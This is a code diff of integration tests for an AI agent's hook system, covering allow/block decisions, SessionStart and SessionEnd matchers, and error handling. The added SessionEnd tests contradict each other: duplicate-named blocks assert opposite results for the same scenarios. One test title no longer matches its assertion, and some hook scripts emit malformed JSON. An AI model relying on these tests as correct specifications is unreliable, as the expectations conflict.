Integration', () => { }, ], }, - trusted: true, }, }); @@ -1277,7 +1217,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -1332,7 +1271,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -1387,7 +1325,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -1448,7 +1385,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -1487,7 +1423,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -1505,60 +1440,20 @@ describe('Hooks System Integration', () => { .filter((line) => line.trim() === 'hook_called').length; expect(hookInvokeCount).toBeGreaterThan(1); }); - - it('should handle stop hook with error alongside blocking hook', async () => { - const blockScript = 'echo {"decision": "block", "reason": "Blocked"}'; - - await rig.setup('stop-error-with-block', { - settings: { - hooksConfig: { enabled: true }, - hooks: { - Stop: [ - { - hooks: [ - { - type: 'command', - command: '/nonexistent/command', - name: 'stop-error-hook', - timeout: 5000, - }, - { - type: 'command', - command: blockScript, - name: 'stop-block-hook', - timeout: 5000, - }, - ], - }, - ], - }, - trusted: true, - }, - }); - - // When Stop hook blocks, agent continues execution normally (with max turns to prevent infinite loop) - const result = await rig.run( - 'Say error with block', - '--max-session-turns', - '2', - ); - expect(result).toBeDefined(); - expect(result.length).toBeGreaterThan(0); - }); }); }); // ========================================================================== - // Multiple Hooks (General) + // Multiple Hooks // Tests for hook execution modes: sequential vs parallel // ========================================================================== describe('Multiple Hooks', () => { describe('Sequential Execution', () => { it('should execute hooks sequentially when sequential: true', async () => { const hook1Script = - 'echo {"decision": "allow", "hookSpecificOutput": {"additionalContext": "first"}}'; + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "first"}}\''; const hook2Script = - 'echo {"decision": "allow", "hookSpecificOutput": {"additionalContext": "second"}}'; + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "second"}}\''; await rig.setup('multi-sequential', { settings: { @@ -1584,7 +1479,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -1594,8 +1488,8 @@ describe('Hooks System Integration', () => { it('should stop at first blocking hook and not execute subsequent', async () => { const blockScript = - 'echo {"decision": "block", "reason": "Blocked by first hook"}'; - const allowScript = 'echo {"decision": "allow"}'; + 'echo \'{"decision": "block", "reason": "Blocked by first hook"}\''; + const allowScript = 'echo \'{"decision": "allow"}\''; await rig.setup('multi-first-blocks', { settings: { @@ -1621,22 +1515,20 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); - // Note: Sequential hooks with block decision currently don't block as expected - // This is a known limitation - the hook config may not be correctly applied for sequential hooks - const result = await rig.run('Create a file'); - expect(result).toBeDefined(); - expect(result.length).toBeGreaterThan(0); + // When the first hook blocks, the UserPromptSubmit should be blocked + await expect(rig.run('Create a file')).rejects.toThrow( + /blocked|Blocked by first hook/i, + ); }); it('should pass output from first hook to second hook input', async () => { const passScript1 = - 'echo {"decision": "allow", "hookSpecificOutput": {"additionalContext": "from first", "passthrough": "data"}}'; + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "from first", "passthrough": "data"}}\''; const passScript2 = - 'echo {"decision": "allow", "hookSpecificOutput": {"additionalContext": "received passthrough"}}'; + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "received passthrough"}}\''; await rig.setup('multi-passthrough', { settings: { @@ -1662,7 +1554,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -1673,8 +1564,8 @@ describe('Hooks System Integration', () => { describe('Parallel Execution', () => { it('should execute hooks in parallel when sequential is not set', async () => { - const hook1Script = 'echo {"decision": "allow"}'; - const hook2Script = 'echo {"decision": "allow"}'; + const hook1Script = 'echo \'{"decision": "allow"}\''; + const hook2Script = 'echo \'{"decision": "allow"}\''; await rig.setup('multi-parallel', { settings: { @@ -1699,7 +1590,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -1710,7 +1600,7 @@ describe('Hooks System Integration', () => { it('should handle mixed success/failure results from parallel hooks', async () => { // For UserPromptSubmit hooks, command execution failure is treated as a blocking error // So when one hook fails, the entire operation is blocked - const allowScript = 'echo {"decision": "allow"}'; + const allowScript = 'echo \'{"decision": "allow"}\''; await rig.setup('multi-mixed', { settings: { @@ -1735,7 +1625,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -1746,8 +1635,9 @@ describe('Hooks System Integration', () => { }); it('should allow when any hook returns allow in parallel (OR logic)', async () => { - const blockScript = 'echo {"decision": "block", "reason": "blocked"}'; - const allowScript = 'echo {"decision": "allow"}'; + const blockScript = + 'echo \'{"decision": "block", "reason": "blocked"}\''; + const allowScript = 'echo \'{"decision": "allow"}\''; await rig.setup('multi-or-logic', { settings: { @@ -1772,12 +1662,1590 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); - const result = await rig.run('Say or logic'); - // With OR logic, allow should win + // With security-sensitive OR logic, block should win (most restrictive decision wins) + await expect(rig.run('Say or logic')).rejects.toThrow(/blocked|error/i); + }); + }); + }); + + // ========================================================================== + // SessionStart Hooks + // Tests for session start lifecycle hooks with rich matcher and aggregator scenarios + // ========================================================================== + describe('SessionStart Hooks', () => { + describe('Single SessionStart Hook', () => { + it('should execute SessionStart hook on session startup', async () => { + const sessionStartScript = + 'echo \'{decision: "allow", hookSpecificOutput: {additionalContext: "Session started successfully"}}\''; + + await rig.setup('session-start-basic', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + hooks: [ + { + type: 'command', + command: sessionStartScript, + name: 'session-start-basic-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say hello'); + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should inject additional context from SessionStart hook', async () => { + const contextScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Project context: TypeScript React app with strict linting rules"}}\''; + + await rig.setup('session-start-context', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + hooks: [ + { + type: 'command', + command: contextScript, + name: 'session-start-context-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('What project context do you have?'); + expect(result).toBeDefined(); + expect(result.toLowerCase()).toContain('typescript'); + }); + + it('should handle SessionStart hook with system message', async () => { + const systemMsgScript = + 'echo \'{"decision": "allow", "systemMessage": "Welcome! Session initialized with custom settings"}\''; + + await rig.setup('session-start-system-msg', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + hooks: [ + { + type: 'command', + command: systemMsgScript, + name: 'session-start-system-msg-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say hello'); + expect(result).toBeDefined(); + }); + }); + + describe('SessionStart Matcher Scenarios', () => { + it('should match startup source with matcher', async () => { + const startupScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Startup hook executed"}}\''; + const otherScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Other hook executed"}}\''; + + await rig.setup('session-start-matcher-startup', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + matcher: 'startup', + hooks: [ + { + type: 'command', + command: startupScript, + name: 'session-start-startup-hook', + timeout: 5000, + }, + ], + }, + { + matcher: 'resume', + hooks: [ + { + type: 'command', + command: otherScript, + name: 'session-start-resume-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say startup test'); + expect(result).toBeDefined(); + }); + + it('should match multiple sources with regex matcher', async () => { + const multiSourceScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Multi-source hook executed"}}\''; + + await rig.setup('session-start-matcher-regex', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + matcher: 'startup|resume', + hooks: [ + { + type: 'command', + command: multiSourceScript, + name: 'session-start-multi-source-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say regex matcher test'); + expect(result).toBeDefined(); + }); + + it('should match all sources with wildcard matcher', async () => { + const wildcardScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Wildcard hook executed"}}\''; + + await rig.setup('session-start-matcher-wildcard', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + matcher: '*', + hooks: [ + { + type: 'command', + command: wildcardScript, + name: 'session-start-wildcard-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say wildcard test'); + expect(result).toBeDefined(); + }); + + it('should not execute when matcher does not match', async () => { + const noMatchScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Should not execute"}}\''; + + await rig.setup('session-start-matcher-no-match', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + matcher: 'clear', // This won't match startup + hooks: [ + { + type: 'command', + command: noMatchScript, + name: 'session-start-clear-only-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say no match test'); + expect(result).toBeDefined(); + }); + + it('should match clear source with matcher', async () => { + const clearScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Clear hook executed"}}\''; + + await rig.setup('session-start-matcher-clear', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + matcher: 'clear', + hooks: [ + { + type: 'command', + command: clearScript, + name: 'session-start-clear-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say clear test'); + expect(result).toBeDefined(); + }); + + it('should match compact source with matcher', async () => { + const compactScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Compact hook executed"}}\''; + + await rig.setup('session-start-matcher-compact', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + matcher: 'compact', + hooks: [ + { + type: 'command', + command: compactScript, + name: 'session-start-compact-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say compact test'); + expect(result).toBeDefined(); + }); + + it('should match all four sources with regex matcher', async () => { + const allSourcesScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "All sources hook executed"}}\''; + + await rig.setup('session-start-matcher-all-sources', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + matcher: 'startup|resume|clear|compact', + hooks: [ + { + type: 'command', + command: allSourcesScript, + name: 'session-start-all-sources-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say all sources test'); + expect(result).toBeDefined(); + }); + + it('should match startup and resume but not clear or compact', async () => { + const startupResumeScript = + 'echo \'{decision: "allow", hookSpecificOutput: {additionalContext: "Startup/Resume hook executed"}}\''; + const clearCompactScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Clear/Compact hook executed"}}\''; + + await rig.setup('session-start-matcher-partial', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + matcher: 'startup|resume', + hooks: [ + { + type: 'command', + command: startupResumeScript, + name: 'session-start-startup-resume-hook', + timeout: 5000, + }, + ], + }, + { + matcher: 'clear|compact', + hooks: [ + { + type: 'command', + command: clearCompactScript, + name: 'session-start-clear-compact-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say partial matcher test'); + expect(result).toBeDefined(); + }); + + it('should handle invalid regex in matcher gracefully', async () => { + const invalidRegexScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Fallback to exact match"}}\''; + + await rig.setup('session-start-matcher-invalid-regex', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + matcher: '[invalid-regex', // Invalid regex pattern + hooks: [ + { + type: 'command', + command: invalidRegexScript, + name: 'session-start-invalid-regex-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say invalid regex test'); + expect(result).toBeDefined(); + }); + + it('should match all session start sources with individual hooks', async () => { + const startupScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Startup triggered"}}\''; + const resumeScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Resume triggered"}}\''; + const clearScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Clear triggered"}}\''; + const compactScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Compact triggered"}}\''; + + await rig.setup('session-start-all-sources-individual', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + matcher: 'startup', + hooks: [ + { + type: 'command', + command: startupScript, + name: 'session-start-startup-hook', + timeout: 5000, + }, + ], + }, + { + matcher: 'resume', + hooks: [ + { + type: 'command', + command: resumeScript, + name: 'session-start-resume-hook', + timeout: 5000, + }, + ], + }, + { + matcher: 'clear', + hooks: [ + { + type: 'command', + command: clearScript, + name: 'session-start-clear-hook', + timeout: 5000, + }, + ], + }, + { + matcher: 'compact', + hooks: [ + { + type: 'command', + command: compactScript, + name: 'session-start-compact-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say all sources individual test'); + expect(result).toBeDefined(); + }); + }); + + describe('Multiple SessionStart Hooks', () => { + it('should execute multiple parallel SessionStart hooks', async () => { + const script1 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Parallel hook 1"}}\''; + const script2 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Parallel hook 2"}}\''; + const script3 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Parallel hook 3"}}\''; + + await rig.setup('session-start-multi-parallel', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + hooks: [ + { + type: 'command', + command: script1, + name: 'session-start-parallel-1', + timeout: 5000, + }, + { + type: 'command', + command: script2, + name: 'session-start-parallel-2', + timeout: 5000, + }, + { + type: 'command', + command: script3, + name: 'session-start-parallel-3', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say multi parallel'); + expect(result).toBeDefined(); + }); + + it('should execute sequential SessionStart hooks in order', async () => { + const script1 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Sequential hook 1"}}\''; + const script2 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Sequential hook 2"}}\''; + + await rig.setup('session-start-multi-sequential', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + sequential: true, + hooks: [ + { + type: 'command', + command: script1, + name: 'session-start-seq-1', + timeout: 5000, + }, + { + type: 'command', + command: script2, + name: 'session-start-seq-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say sequential'); + expect(result).toBeDefined(); + }); + + it('should concatenate additional context from multiple hooks', async () => { + const context1 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Context from hook 1"}}\''; + const context2 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Context from hook 2"}}\''; + + await rig.setup('session-start-multi-context', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + hooks: [ + { + type: 'command', + command: context1, + name: 'session-start-ctx-1', + timeout: 5000, + }, + { + type: 'command', + command: context2, + name: 'session-start-ctx-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('What context do you have?'); + expect(result).toBeDefined(); + }); + + it('should handle system messages from multiple hooks', async () => { + const msg1 = + 'echo \'{"decision": "allow", "systemMessage": "System message 1"}\''; + const msg2 = + 'echo \'{"decision": "allow", "systemMessage": "System message 2"}\''; + + await rig.setup('session-start-multi-system-msg', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + hooks: [ + { + type: 'command', + command: msg1, + name: 'session-start-sys-1', + timeout: 5000, + }, + { + type: 'command', + command: msg2, + name: 'session-start-sys-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say hello'); + expect(result).toBeDefined(); + }); + }); + + describe('SessionStart Error Handling', () => { + it('should continue session when hook exits with non-blocking error', async () => { + await rig.setup('session-start-nonblocking-error', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + hooks: [ + { + type: 'command', + command: 'echo warning && exit 1', + name: 'session-start-error-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say error test'); + expect(result).toBeDefined(); + }); + + it('should continue session when hook command does not exist', async () => { + await rig.setup('session-start-missing-command', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + hooks: [ + { + type: 'command', + command: '/nonexistent/session/start/command', + name: 'session-start-missing-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say missing test'); + expect(result).toBeDefined(); + }); + + it('should handle hook timeout gracefully', async () => { + await rig.setup('session-start-timeout', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + hooks: [ + { + type: 'command', + command: 'sleep 60', + name: 'session-start-timeout-hook', + timeout: 1000, // 1 second timeout + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say timeout test'); + expect(result).toBeDefined(); + }); + }); + }); + + // ========================================================================== + // SessionEnd Hooks + // Tests for session end lifecycle hooks with various exit reasons + // ========================================================================== + describe('SessionEnd Hooks', () => { + describe('Single SessionEnd Hook', () => { + it('should execute SessionEnd hook on session end', async () => { + const sessionEndScript = 'echo \'{"decision": "allow"}\''; + + await rig.setup('session-end-basic', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: sessionEndScript, + name: 'session-end-basic-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say hello'); + expect(result).toBeDefined(); + }); + + it('should execute SessionEnd hook with cleanup tasks', async () => { + const cleanupScript = + 'echo {decision: "allow", hookSpecificOutput: {additionalContext: "Cleanup completed"}}'; + + await rig.setup('session-end-cleanup', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: cleanupScript, + name: 'session-end-cleanup-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say cleanup test'); + expect(result).toBeDefined(); + }); + }); + + describe('SessionEnd Matcher Scenarios', () => { + it('should match specific exit reason with matcher', async () => { + const clearScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Clear hook executed"}}\''; + const logoutScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Logout hook executed"}}\''; + + await rig.setup('session-end-matcher-clear', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + matcher: 'clear', + hooks: [ + { + type: 'command', + command: clearScript, + name: 'session-end-clear-hook', + timeout: 5000, + }, + ], + }, + { + matcher: 'logout', + hooks: [ + { + type: 'command', + command: logoutScript, + name: 'session-end-logout-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say matcher test'); + expect(result).toBeDefined(); + }); + + it('should match multiple exit reasons with regex matcher', async () => { + const multiReasonScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Multi-reason hook executed"}}\''; + + await rig.setup('session-end-matcher-regex', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + matcher: 'clear|logout|other', + hooks: [ + { + type: 'command', + command: multiReasonScript, + name: 'session-end-multi-reason-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say regex matcher test'); + expect(result).toBeDefined(); + }); + + it('should match all reasons with wildcard matcher', async () => { + const wildcardScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Wildcard end hook executed"}}\''; + + await rig.setup('session-end-matcher-wildcard', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + matcher: '*', + hooks: [ + { + type: 'command', + command: wildcardScript, + name: 'session-end-wildcard-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say wildcard test'); + expect(result).toBeDefined(); + }); + + it('should handle invalid regex in SessionEnd matcher gracefully', async () => { + const invalidRegexScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "SessionEnd fallback to exact match"}}\''; + + await rig.setup('session-end-matcher-invalid-regex', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + matcher: '[invalid-regex', // Invalid regex pattern + hooks: [ + { + type: 'command', + command: invalidRegexScript, + name: 'session-end-invalid-regex-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say invalid regex SessionEnd test'); + expect(result).toBeDefined(); + }); + + it('should match all SessionEnd reasons with individual hooks', async () => { + const clearScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Clear reason triggered"}}\''; + const logoutScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Logout reason triggered"}}\''; + const promptExitScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "PromptInputExit reason triggered"}}\''; + const bypassDisabledScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Bypass permissions disabled triggered"}}\''; + const otherScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Other reason triggered"}}\''; + + await rig.setup('session-end-all-reasons-individual', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + matcher: 'clear', + hooks: [ + { + type: 'command', + command: clearScript, + name: 'session-end-clear-hook', + timeout: 5000, + }, + ], + }, + { + matcher: 'logout', + hooks: [ + { + type: 'command', + command: logoutScript, + name: 'session-end-logout-hook', + timeout: 5000, + }, + ], + }, + { + matcher: 'promptInputExit', + hooks: [ + { + type: 'command', + command: promptExitScript, + name: 'session-end-prompt-exit-hook', + timeout: 5000, + }, + ], + }, + { + matcher: 'bypass_permissions_disabled', + hooks: [ + { + type: 'command', + command: bypassDisabledScript, + name: 'session-end-bypass-disabled-hook', + timeout: 5000, + }, + ], + }, + { + matcher: 'other', + hooks: [ + { + type: 'command', + command: otherScript, + name: 'session-end-other-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say all SessionEnd reasons test'); + expect(result).toBeDefined(); + }); + }); + + describe('Multiple SessionEnd Hooks', () => { + it('should execute multiple parallel SessionEnd hooks', async () => { + const script1 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "End hook 1"}}\''; + const script2 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "End hook 2"}}\''; + + await rig.setup('session-end-multi-parallel', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: script1, + name: 'session-end-parallel-1', + timeout: 5000, + }, + { + type: 'command', + command: script2, + name: 'session-end-parallel-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say multi parallel end'); + expect(result).toBeDefined(); + }); + + it('should execute sequential SessionEnd hooks in order', async () => { + const script1 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Sequential end hook 1"}}\''; + const script2 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Sequential end hook 2"}}\''; + + await rig.setup('session-end-multi-sequential', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + sequential: true, + hooks: [ + { + type: 'command', + command: script1, + name: 'session-end-seq-1', + timeout: 5000, + }, + { + type: 'command', + command: script2, + name: 'session-end-seq-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say sequential end'); + expect(result).toBeDefined(); + }); + + it('should concatenate additional context from multiple hooks', async () => { + const context1 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "End context from hook 1"}}\''; + const context2 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "End context from hook 2"}}\''; + + await rig.setup('session-end-multi-context', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: context1, + name: 'session-end-ctx-1', + timeout: 5000, + }, + { + type: 'command', + command: context2, + name: 'session-end-ctx-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say end context test'); + expect(result).toBeDefined(); + }); + }); + + describe('SessionEnd Block Scenarios', () => { + it('should block session end when hook returns block decision', async () => { + const blockScript = + 'echo \'{"decision": "block", "reason": "Session end blocked by policy"}\''; + + await rig.setup('session-end-block', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: blockScript, + name: 'session-end-block-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say block test'); + expect(result).toBeDefined(); + // Session should not end, agent continues + expect(result.toLowerCase()).toContain('block'); + }); + + it('should allow session end when hook returns allow decision', async () => { + const allowScript = + 'echo \'{"decision": "allow", "reason": "Session end allowed"}\''; + + await rig.setup('session-end-allow', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: allowScript, + name: 'session-end-allow-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say allow test'); + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should block when one of multiple parallel hooks returns block', async () => { + const allowScript = + 'echo \'{"decision": "allow", "reason": "Allowed"}\''; + const blockScript = + 'echo \'{"decision": "block", "reason": "Blocked by security policy"}\''; + + await rig.setup('session-end-multi-one-blocks', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: allowScript, + name: 'session-end-allow-hook', + timeout: 5000, + }, + { + type: 'command', + command: blockScript, + name: 'session-end-block-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say multi block test'); + expect(result).toBeDefined(); + expect(result.toLowerCase()).toContain('block'); + }); + + it('should block when first sequential hook returns block', async () => { + const blockScript = + 'echo \'{"decision": "block", "reason": "First hook blocks session end"}\''; + const allowScript = 'echo \'{"decision": "allow"}\''; + + await rig.setup('session-end-seq-first-blocks', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + sequential: true, + hooks: [ + { + type: 'command', + command: blockScript, + name: 'session-end-seq-block-hook', + timeout: 5000, + }, + { + type: 'command', + command: allowScript, + name: 'session-end-seq-allow-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say seq block test'); + expect(result).toBeDefined(); + expect(result.toLowerCase()).toContain('block'); + }); + + it('should allow when all hooks return allow', async () => { + const allow1Script = + 'echo \'{"decision": "allow", "reason": "First allows"}\''; + const allow2Script = + 'echo \'{"decision": "allow", "reason": "Second allows"}\''; + + await rig.setup('session-end-all-allow', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: allow1Script, + name: 'session-end-allow-1', + timeout: 5000, + }, + { + type: 'command', + command: allow2Script, + name: 'session-end-allow-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say all allow test'); + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should handle block with reason in session end', async () => { + const blockWithReasonScript = + 'echo \'{"decision": "block", "reason": "Critical operations pending - cannot end session"} \''; + + await rig.setup('session-end-block-with-reason', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: blockWithReasonScript, + name: 'session-end-block-reason-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say block with reason'); + expect(result).toBeDefined(); + expect(result.toLowerCase()).toContain('block'); + }); + }); + + describe('SessionEnd Error Handling', () => { + it('should continue session end when hook exits with non-blocking error', async () => { + await rig.setup('session-end-nonblocking-error', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: 'echo warning && exit 1', + name: 'session-end-error-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say error test'); + expect(result).toBeDefined(); + }); + + it('should continue session end when hook command does not exist', async () => { + await rig.setup('session-end-missing-command', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: '/nonexistent/session/end/command', + name: 'session-end-missing-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say missing test'); + expect(result).toBeDefined(); + }); + }); + + describe('Multiple SessionEnd Hooks', () => { + it('should block when one of multiple parallel hooks returns block', async () => { + const allowScript = 'echo \'{"decision": "allow"}\''; + const blockScript = + 'echo \'{"decision": "block", "reason": "Blocked"}\''; + + await rig.setup('session-end-multi-one-blocks', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: allowScript, + name: 'session-end-allow-hook', + timeout: 5000, + }, + { + type: 'command', + command: blockScript, + name: 'session-end-block-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say hello'); + expect(result).toBeDefined(); + // SessionEnd hooks run after the main command completes and don't affect the main output + expect(result.toLowerCase()).not.toContain('block'); + }); + + it('should block when first sequential hook returns block', async () => { + const blockScript = + 'echo \'{"decision": "block", "reason": "Blocked"}\''; + const allowScript = 'echo \'{"decision": "allow"}\''; + + await rig.setup('session-end-seq-first-blocks', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + sequential: true, + hooks: [ + { + type: 'command', + command: blockScript, + name: 'session-end-seq-block-hook', + timeout: 5000, + }, + { + type: 'command', + command: allowScript, + name: 'session-end-seq-allow-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say test'); + expect(result).toBeDefined(); + // SessionEnd hooks run after the main command completes and don't affect the main output + expect(result.toLowerCase()).not.toContain('block'); + 